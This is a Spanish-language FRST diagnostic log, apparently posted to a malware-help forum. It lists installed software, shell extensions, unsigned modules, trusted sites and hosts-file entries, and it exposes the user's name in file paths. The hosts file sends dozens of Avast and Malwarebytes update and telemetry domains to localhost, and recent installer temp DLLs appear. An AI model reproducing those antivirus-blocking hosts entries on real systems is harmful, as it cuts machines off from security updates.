Scansoft PDF Professional (HKLM-x32\...\{068724F8-D8BE-4B43-8DDD-B9FE9E49FD76}) (Version:  - ) Hidden
Scientific WorkPlace 4.0 (HKLM-x32\...\{3FDA5DE5-5606-11D5-821A-00104BD1670F}) (Version:  - )
Service Pack 2 para SQL Server 2008 (KB2285068) (64-bit) (HKLM\...\KB2285068) (Version: 10.2.4000.0 - Microsoft Corporation)
Shape Collage (HKLM-x32\...\ShapeCollage) (Version:  - Vincent Cheung)
Smilebox (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Smilebox) (Version: 1.0.0.31741 - Smilebox, Inc.)
SpeechRedist (HKLM-x32\...\{8795CBED-55E2-4693-9F14-84EC446935BE}) (Version: 1.0.0 - Epic Games Inc.)
Sql Server Customer Experience Improvement Program (HKLM\...\{2F14965D-567B-4E59-ADEB-0A2CC1E3ADDF}) (Version: 10.2.4000.0 - Microsoft Corporation) Hidden
STATISTICA CambridgeSoft Integration (HKLM-x32\...\{A1E1083D-249D-483C-AD92-CDCFA230A4C7}) (Version: 1.00.0000 - StatSoft, Inc.)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 13.2.2.0 - Synaptics Incorporated)
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.36215 - TeamViewer)
Technitium MAC Address Changer v6.0 (HKLM-x32\...\TMACv6.0) (Version: 6.0 - Technitium)
ThermoSolver 1.0 (HKLM-x32\...\ThermoSolver 1.0_is1) (Version:  - )
Thumbnail me 3.0 Beta (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Thumbnail me 3.0 Beta) (Version:  - )
Ulead VideoStudio SE DVD (HKLM-x32\...\{8F8D9297-FDD2-405A-97E7-E52C7B2F97B3}) (Version: 10.0 - Ulead Systems)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-0011-0000-0000-0000000FF1CE}_Office16.PROPLUS_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-002A-0000-1000-0000000FF1CE}_Office16.PROPLUS_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-002A-0000-1000-0000000FF1CE}_Office16.VISPRO_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-012B-0C0A-0000-0000000FF1CE}_Office16.PROPLUS_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
USB2.0 ATV (HKLM-x32\...\{3C873221-12B9-475D-8DCB-62D0B2179AF9}) (Version: 6.10.000.001 - Regulus)
VB 2010 SBS (HKLM-x32\...\{0C133A44-18C5-406B-9A6B-1E696CCDF809}) (Version: 2.00.11 - Microsoft Press)
VBA (2720) (HKLM-x32\...\{FC45B592-2DE6-11D3-A113-00805FEAD43C}) (Version: 6.01.00.1234 - Microsoft Corporation) Hidden
VidLord (HKLM-x32\...\{B85316D9-534F-4F79-927B-9D990762DC2C}) (Version: 6.0.0 - Knight Consulting)
Visual Basic for Applications (HKLM-x32\...\VBA) (Version:  - )
Visual C++ Runtime for Dragon NaturallySpeaking 64bit (x64) (HKLM\...\{4A5A427F-BA39-4BF0-9A47-7777FBE60C9F}) (Version: 10.00.800.228 - Nuance Communications Inc.)
Visual Studio 2010 Prerequisites - English (HKLM\...\{95480F46-25D7-31D1-ACD2-D8722B133A0C}) (Version: 10.0.30319 - Microsoft Corporation)
Visual Studio 2010 Tools for SQL Server Compact 3.5 SP2 ESN (HKLM-x32\...\{CF72A524-84BD-4AB7-B3C6-2C358672CD15}) (Version: 4.0.8080.0 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.6 - VideoLAN)
Web Deployment Tool (HKLM\...\{0F37D969-1260-419E-B308-EF7D29ABDE20}) (Version: 1.1.0618 - Microsoft Corporation)
Welcome App (Start-up experience) (HKLM-x32\...\{828175FA-7307-4DBF-95AD-9CEE086B6F45}) (Version: 12.0.14000 - Nero AG) Hidden
Welcome Center (HKLM-x32\...\Acer Welcome Center) (Version: 1.00.3008 - Acer Incorporated)
WinAVI All in One Converter (HKLM-x32\...\WinAVI All in One Converter) (Version: 1.6.0.4147 - ZJMedia Digital Technology Ltd.)
WinAVI Video Converter 9.0 (HKLM-x32\...\WinAVI Video Converter 9.09.0) (Version: 9.0 - WinAVI Video Converter 9.0)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{953D4586-9A16-495E-BA1F-EE5AA66604DB}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
Wondershare Filmora(Build 8.7.0) (HKLM\...\Wondershare Filmora_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.6.0 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.6.0 - Wondershare)
XML Copy Editor version 1.2.1.2 (HKLM\...\XML Copy Editor_is1) (Version: 1.2.1.2 - Zane U. Ji)

Marco · 26 Marzo, 2020 21:10

==================== Personalizado CLSID (Lista blanca): ==============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - C:\Windows\system32\webcheck.dll (Microsoft Windows -> Microsoft Corporation)
SSODL-x32: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - C:\Windows\SysWow64\webcheck.dll (Microsoft Windows -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [			IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2019-05-02] (Tonec Inc. -> Tonec Inc.)
ShellIconOverlayIdentifiers: [egisPSDP] -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\psdprotect.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ShellIconOverlayIdentifiers-x32: [egisPSDP] -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\psdprotect.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov) [Archivo no firmado]
ContextMenuHandlers1: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} =>  -> Ningún archivo
ContextMenuHandlers1: [AimersoftVideoConverterFileOpreation] -> {1AACB93E-AA97-47F1-BD02-8D2AF2815436} => C:\Windows\SysWOW64\AiCM64.dll [2013-08-23] () [Archivo no firmado]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_05.dll [2012-06-18] () [Archivo no firmado]
ContextMenuHandlers1: [Cover Designer] -> {73FCA462-9BD5-4065-A73F-A8E5F6904EF7} =>  -> Ningún archivo
ContextMenuHandlers1: [EDPShell] -> {58549232-7081-4541-882C-767DB238453C} => C:\Program Files\ExamDiff Pro\EDPShell.dll [2016-03-25] (PrestoSoft -> PrestoSoft LLC) [Archivo no firmado]
ContextMenuHandlers1: [EDSshellExt] -> {29FF7AB0-BE34-4992-A30B-53A9D86EE239} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\mwlshellext.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ContextMenuHandlers1: [PDFC7.ShellExtension] -> {877327F4-8A93-4320-932C-338069C27BEA} => C:\Program Files (x86)\Nuance\PDF Professional 7\ShellExt70.dll [2011-04-28] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
ContextMenuHandlers1: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files (x86)\PowerISO\PWRISOSH.DLL [2009-07-26] (PowerISO Computing, Inc.) [Archivo no firmado]
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1: [Zeon.MFCDirectShellExt] -> {353C642C-F13D-4699-9FF2-EFAF490B6C69} => C:\Program Files (x86)\Nuance\PDF Professional 7\bin\DirectShellExt.dll [2010-07-16] (Zeon Corporation -> Zeon International Investment Corp. )
ContextMenuHandlers2-x32: [Ulead UDF Driver] -> {DBD8E168-244D-448C-9922-25508950D1DC} => C:\Program Files (x86)\Common Files\Ulead Systems\DVD\USIShex.dll [2005-03-02] (Ulead Systems, Inc.) [Archivo no firmado]
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov) [Archivo no firmado]
ContextMenuHandlers4: [EDSshellExt] -> {29FF7AB0-BE34-4992-A30B-53A9D86EE239} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\mwlshellext.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ContextMenuHandlers4: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files (x86)\PowerISO\PWRISOSH.DLL [2009-07-26] (PowerISO Computing, Inc.) [Archivo no firmado]
ContextMenuHandlers4-x32: [SimpleShlExt] -> {A53118EA-E89E-49BD-AB1B-AB180BB12CFE} => C:\Program Files (x86)\Clarus\Samsung Auto Backup\ShContextMenu.dll [2010-07-28] (Clarus, Inc.) [Archivo no firmado]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [EDPShell] -> {58549232-7081-4541-882C-767DB238453C} => C:\Program Files\ExamDiff Pro\EDPShell.dll [2016-03-25] (PrestoSoft -> PrestoSoft LLC) [Archivo no firmado]
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files (x86)\PowerISO\PWRISOSH.DLL [2009-07-26] (PowerISO Computing, Inc.) [Archivo no firmado]
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Lista blanca) ====================

(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

HKLM\...\Drivers32: [VIDC.FICV] => C:\Windows\system32\ficvdec_x64.dll [652288 2013-05-07] () [Archivo no firmado]
HKLM\...\Drivers32: [vidc.i420] => C:\Windows\SysWOW64\i420vfw.dll [70656 2004-01-24] (www.helixcommunity.org) [Archivo no firmado]
HKLM\...\Drivers32: [msacm.dvacm] => C:\Program Files (x86)\Common Files\Ulead Systems\VIO\DVACM.acm [32768 2006-03-06] (Ulead Systems, Inc.) [Archivo no firmado]
HKLM\...\Drivers32: [msacm.MPEGacm] => C:\Program Files (x86)\Common Files\Ulead Systems\MPEG\MPEGACM.acm [69632 2004-07-23] (Ulead Systems, Inc.) [Archivo no firmado]
HKLM\...\Drivers32: [msacm.ulmp3acm] => C:\Program Files (x86)\Common Files\Ulead Systems\MPEG\ulmp3acm.acm [319488 2006-01-23] (Ulead systems) [Archivo no firmado]
HKLM\...\Drivers32: [VIDC.FICV] => C:\Windows\SysWOW64\ficvdec_x86.dll [641024 2013-05-07] () [Archivo no firmado]
HKLM\...\Drivers32-x32: [vidc.XVID] => xvidvfw.dll
HKLM\...\Drivers32-x32: [VIDC.VP80] => vp8vfw.dll

==================== Accesos directos & WMI ========================

(Las entradas pueden ser listadas para ser restauradas o eliminadas.)

ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplicaciones de Chrome\Twitter.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe (Google LLC) ->  --profile-directory="Profile 1" --app-id=jgeocpdicgmkeemopbanhokmhcgcflmi
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Marco - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
ShortcutWithArgument: C:\Users\Public\Desktop\Acer Accessorios.lnk -> C:\Program Files\Acer Accessory Store\StartURL.exe () -> hxxp://store.acer-euro.com/es?utm_source=Icon&utm_medium=Icon&utm_campaign=Acer%2BInternal

==================== Módulos cargados (Lista blanca) =============

2017-04-01 22:23 - 2016-07-21 10:54 - 000137728 _____ () [Archivo no firmado] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2017-04-01 22:23 - 2016-10-08 17:03 - 001506304 _____ () [Archivo no firmado] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2018-05-05 02:32 - 2016-07-21 09:54 - 000137728 _____ () [Archivo no firmado] C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\CBSCreateVC.dll
2018-05-05 02:32 - 2017-09-12 09:34 - 001506304 _____ () [Archivo no firmado] C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\DAQExp.dll
2008-09-28 18:55 - 2008-09-28 18:55 - 001076224 _____ () [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\ACE.dll
2009-02-02 18:33 - 2009-02-02 18:33 - 000460199 _____ () [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\sqlite3.dll
2012-06-18 09:24 - 2012-06-18 09:24 - 000222720 _____ () [Archivo no firmado] C:\Program Files (x86)\Notepad++\NppShell_05.dll
2017-08-11 22:05 - 2017-07-26 09:16 - 000029696 _____ () [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\WinDivert.dll
2020-03-26 12:17 - 2020-03-26 12:17 - 000876544 _____ () [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-26H2V.tmp\MouliaLeFil.tmp
2020-03-26 12:17 - 2008-07-23 20:37 - 000203264 _____ () [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-VCVR4.tmp\itdownload.dll
2017-09-08 17:39 - 2018-11-10 20:15 - 000004096 _____ () [Archivo no firmado] C:\Windows\[email protected]
2017-08-26 15:53 - 2013-08-23 12:36 - 000721263 _____ () [Archivo no firmado] C:\Windows\SysWOW64\AiCM64.dll
2017-04-09 19:33 - 2017-07-26 09:15 - 000537088 _____ (FreeDownloadManager.org) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\common.dll
2008-12-03 19:05 - 2008-12-03 19:05 - 000071680 _____ (Hewlett-Packard) [Archivo no firmado] c:\windows\system32\hpzinw12.dll
2008-12-03 19:05 - 2008-12-03 19:05 - 000089600 ____N (Hewlett-Packard) [Archivo no firmado] c:\windows\system32\hpzipm12.dll
2010-11-18 20:08 - 2010-11-18 20:08 - 000086016 _____ (Igor Pavlov) [Archivo no firmado] C:\Program Files\7-Zip\7-zip.dll
2009-12-01 07:50 - 2009-06-04 12:05 - 000077824 _____ (Intel Corporation) [Archivo no firmado] C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\ESP\IAAMon_ESP.dll
2009-12-01 07:50 - 2009-06-04 12:04 - 000126976 _____ (Intel Corporation) [Archivo no firmado] C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\ESP\PlugInRAID_ESP.dll
2009-12-01 07:50 - 2009-06-04 11:55 - 000208896 _____ (Intel Corporation) [Archivo no firmado] C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\ISDI.dll
2002-02-14 14:00 - 2002-02-14 14:00 - 000024576 _____ (Microsoft Corporation) [Archivo no firmado] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\3082\mdmui.dll
2008-06-05 11:57 - 2008-06-05 11:57 - 001047552 _____ (Microsoft Corporation) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\MFC71U.DLL
2008-06-05 11:57 - 2008-06-05 11:57 - 000499712 _____ (Microsoft Corporation) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\MSVCP71.dll
2008-06-05 11:57 - 2008-06-05 11:57 - 000348160 _____ (Microsoft Corporation) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\MSVCR71.dll
2019-03-27 23:48 - 2019-03-27 23:48 - 000115200 _____ (Microsoft Corporation) [Archivo no firmado] C:\Windows\Microsoft.Net\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll
2020-03-26 12:17 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-VCVR4.tmp\idp.dll
2009-09-23 19:20 - 2009-09-23 19:20 - 000045056 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\agent_stub.dll
2009-09-23 19:26 - 2009-09-23 19:26 - 000400896 ____N (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\ISchedule.DLL
2009-09-23 19:26 - 2009-09-23 19:26 - 000329216 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IShadowS3.dll
2009-09-23 19:23 - 2009-09-23 19:23 - 000012800 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\MUI\0c0a\lang.dll
2009-09-23 19:25 - 2009-09-23 19:25 - 000044544 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\Pehook.DLL
2009-09-23 19:27 - 2009-09-23 19:27 - 000403456 ____N (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\SyncDll.DLL
2009-09-23 19:19 - 2009-09-23 19:19 - 000057856 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\VssAgent.dll
2009-09-23 19:20 - 2009-09-23 19:20 - 000018944 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\WirelessDll.dll
2009-06-17 17:05 - 2009-06-17 17:05 - 000010240 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\SchedulerSvcLOC.dll
2009-07-26 20:41 - 2009-07-26 20:41 - 000220160 _____ (PowerISO Computing, Inc.) [Archivo no firmado] C:\Program Files (x86)\PowerISO\PWRISOSH.DLL
2016-03-25 13:30 - 2016-03-25 13:33 - 000277016 _____ (PrestoSoft -> PrestoSoft LLC) [Archivo no firmado] C:\Program Files\ExamDiff Pro\EDPShell.dll
2020-03-26 11:34 - 2020-03-26 11:34 - 001008128 _____ (Robert Simpson, et al.) [Archivo no firmado] C:\ProgramData\Logic Cramble\x86\SQLite.Interop.dll
2017-04-09 19:33 - 2017-07-26 09:20 - 005664256 _____ (The Qt Company Ltd) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\Qt5Core.dll
2017-04-09 19:33 - 2016-03-03 14:26 - 006019072 _____ (The Qt Company Ltd) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\Qt5Gui.dll
2017-04-09 19:33 - 2016-03-03 14:23 - 001064960 _____ (The Qt Company Ltd) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\Qt5Network.dll
2017-04-09 19:33 - 2016-03-03 14:21 - 000203776 _____ (The Qt Company Ltd) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\Qt5Sql.dll
2017-04-09 19:33 - 2016-03-03 14:32 - 005472768 _____ (The Qt Company Ltd) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\Qt5Widgets.dll
2020-03-26 12:17 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-VCVR4.tmp\psvince.dll
2017-04-01 22:23 - 2016-10-08 17:04 - 000708608 _____ (Wondershare) [Archivo no firmado] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
2018-05-05 02:32 - 2017-09-12 09:36 - 000708608 _____ (Wondershare) [Archivo no firmado] C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\CBSProducstInfo.dll

==================== Alternate Data Streams (Lista blanca) ========

(Si una entrada es incluida en el fixlist, solamente los ADS serán eliminados.)

AlternateDataStreams: C:\ProgramData\Temp:0574215C [120]
AlternateDataStreams: C:\ProgramData\Temp:D95ACC7D [135]

==================== Modo Seguro (Lista blanca) ==================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El "AlternateShell" será restaurado.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service"

==================== Asociación (Lista blanca) =================

==================== Internet Explorer sitios de confianza/restringidos ==========

(Si una entrada es incluida en el fixlist, será eliminada del registro.)

IE trusted site: HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts contenido: =========================

(Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.)

2017-11-17 19:06 - 2019-10-03 00:23 - 000010877 ____R C:\Windows\system32\drivers\etc\hosts
127.0.0.1  telemetry.malwarebytes.com
127.0.0.1  skipittok.com
127.0.0.1	gf.tools.avast.com
127.0.0.1	pair.ff.avast.com
127.0.0.1	ipm-provider.ff.avast.com
127.0.0.1	ipm-provider.ff.avast.com
127.0.0.1	ipm-provider.ff.avast.com
127.0.0.1	id.avast.com
127.0.0.1	s5355946.iavs9x.u.avast.com
127.0.0.1	s5355946.ivps9x.u.avast.com
127.0.0.1	s5355946.ivps9tiny.u.avast.com
127.0.0.1	s5355946.vpsnitro.u.avast.com
127.0.0.1	s5355946.vpsnitrotiny.u.avast.com
127.0.0.1	s5355946.iavs5x.u.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7event.stats.avast.com
127.0.0.1	sm00.avast.com
127.0.0.1	submit5.avast.com
127.0.0.1	geoip.avast.com
127.0.0.1	l2932126.iavs9x.u.avast.com
127.0.0.1	l2932126.ivps9x.u.avast.com
127.0.0.1	l2932126.ivps9tiny.u.avast.com
127.0.0.1	l2932126.vpsnitro.u.avast.com
127.0.0.1	l2932126.vpsnitrotiny.u.avast.com
127.0.0.1	l2932126.iavs5x.u.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7event.stats.avast.com
127.0.0.1	sm00.avast.com

Hay 243 más lineas.


2012-05-07 12:19 - 2012-05-07 12:20 - 000000441 _____ C:\Windows\system32\drivers\etc\hosts.ics

==================== Otras Áreas ===========================

(Actualmente no existe una corrección automática para esta sección.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\system32\wbem;C:\PROGRA~2\COMMON~1\ASPENT~1;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0;C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86;C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64;c:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn;c:\Program Files\Microsoft SQL Server\100\Tools\Binn;c:\Program Files\Microsoft SQL Server\100\DTS\Binn;C:\Program Files (x86)\Common Files\Ulead Systems\MPEG;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files (x86)\Common Files\Roxio Shared\DLLShared;C:\Program Files (x86)\Smart Projects\IsoBuster;C:\Program Files (x86)\QuickTime\QTSystem\;c:\Program Files (x86)\Microsoft SQL Server\90\Tools\binn\
HKU\S-1-5-21-1649130365-987012723-906343211-1000\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: El medio no está conectado a internet.
